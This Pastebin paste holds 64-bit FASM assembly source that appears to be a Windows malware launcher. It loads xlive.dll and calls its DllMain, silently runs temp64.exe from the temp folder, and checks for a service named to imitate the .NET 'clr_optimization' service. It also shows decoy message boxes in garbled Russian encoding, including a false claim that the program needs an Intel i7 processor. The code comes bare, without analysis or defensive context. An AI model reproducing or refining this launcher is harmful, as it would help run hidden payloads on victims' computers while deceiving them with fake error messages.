API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 24th, 2017
58
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 2.62 KB | None | 0 0
raw download clone embed print report
  1. format PE64 GUI 5.0
  2. entry Main
  3.  
  4. include 'win64a.inc'
  5.  
  6. section '.data' data readable writeable
  7.  
  8.         szServiceName db "clr_optimization_v2.0.5066_32",0
  9.  
  10.         DllnotFound db "Dll xlive.dll not found.",0
  11.         Alert db "Ïðîãðàììó íåîáõîäèìî çàïóñòèòü îò èìåíè Aäìèíèñòðàòîðà.",0
  12.         Fake db "Ïðîãðàììà ïðåäíàçíà÷åíà äëÿ âûïîëíåíèÿ íà ïðîöåññîðàõ Intel i7 è âûøå.",0
  13.         dllname db "xlive.dll",0
  14.         maindll db "DllMain",0
  15.         exename db "temp64.exe",0
  16.  
  17.         schSCManager dq ?
  18.         hLib dq ?
  19.         temp db 260 dup (?)
  20.  
  21.         ErrorBuff db 260 dup (?)
  22.         sfc db '%d',0
  23.  
  24. section '.code' code readable executable
  25.  
  26. proc Main
  27.  
  28.         sub rsp,8*4
  29.  
  30.         lea rcx,[dllname]
  31.         call LoadLibraryA
  32.  
  33.         call LastError
  34.  
  35.         cmp rax,0
  36.         je .dllnotfound
  37.  
  38.         mov [hLib],rax
  39.  
  40.         invoke GetProcAddress,rax,maindll
  41.  
  42.         call rax
  43.  
  44.         invoke FreeLibrary,[hLib]
  45.  
  46.         invoke GetTempPathA,260,temp
  47.         invoke lstrcatA,temp,exename
  48.         invoke ShellExecuteA,0,0,temp,0,0,0
  49.  
  50.         invoke OpenSCManagerA,0,0,0F003Fh
  51.         mov [schSCManager],rax
  52.  
  53.         invoke OpenServiceA,[schSCManager],szServiceName,10000h
  54.         mov [schSCManager],rax
  55.  
  56.         cmp rax,0
  57.         jz .exit
  58.  
  59.         invoke CloseServiceHandle,[schSCManager]
  60.         invoke MessageBoxA,0,Fake,0,30h
  61.         invoke ExitProcess,rax
  62.  
  63. .dllnotfound:
  64.  
  65.         invoke MessageBoxA,0,DllnotFound,0,10h
  66.         invoke ExitProcess,rax
  67. .exit:
  68.         invoke CloseServiceHandle,[schSCManager]
  69.         invoke MessageBoxA,0,Alert,0,30h
  70.         invoke ExitProcess,rax
  71. endp
  72.  
  73. proc LastError
  74.  
  75.      invoke GetLastError
  76.      invoke wsprintfA,ErrorBuff,sfc,rax
  77.      invoke MessageBoxA,0,ErrorBuff,0,00000030h
  78.      ret
  79.  
  80. endp
  81.  
  82. section '.idata' import data readable
  83.  
  84.   library kernel,'KERNEL32.DLL',\
  85.           user,'USER32.DLL',\
  86.           shell,'SHELL32.DLL',\
  87.           advapi,'ADVAPI32.DLL'
  88.  
  89.   import advapi,\
  90.          OpenSCManagerA,'OpenSCManagerA',\
  91.          OpenServiceA,'OpenServiceA',\
  92.          CloseServiceHandle,'CloseServiceHandle'
  93.  
  94.   import kernel,\
  95.          ExitProcess,'ExitProcess',\
  96.          GetTempPathA,'GetTempPathA',\
  97.          lstrcatA,'lstrcatA',\
  98.          LoadLibraryA,'LoadLibraryA',\
  99.          GetProcAddress,'GetProcAddress',\
  100.          FreeLibrary,'FreeLibrary',\
  101.          GetLastError,'GetLastError'
  102.  
  103.   import shell,\
  104.          ShellExecuteA,'ShellExecuteA'
  105.  
  106.   import user,\
  107.          MessageBoxA,'MessageBoxA',\
  108.          wsprintfA,'wsprintfA'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!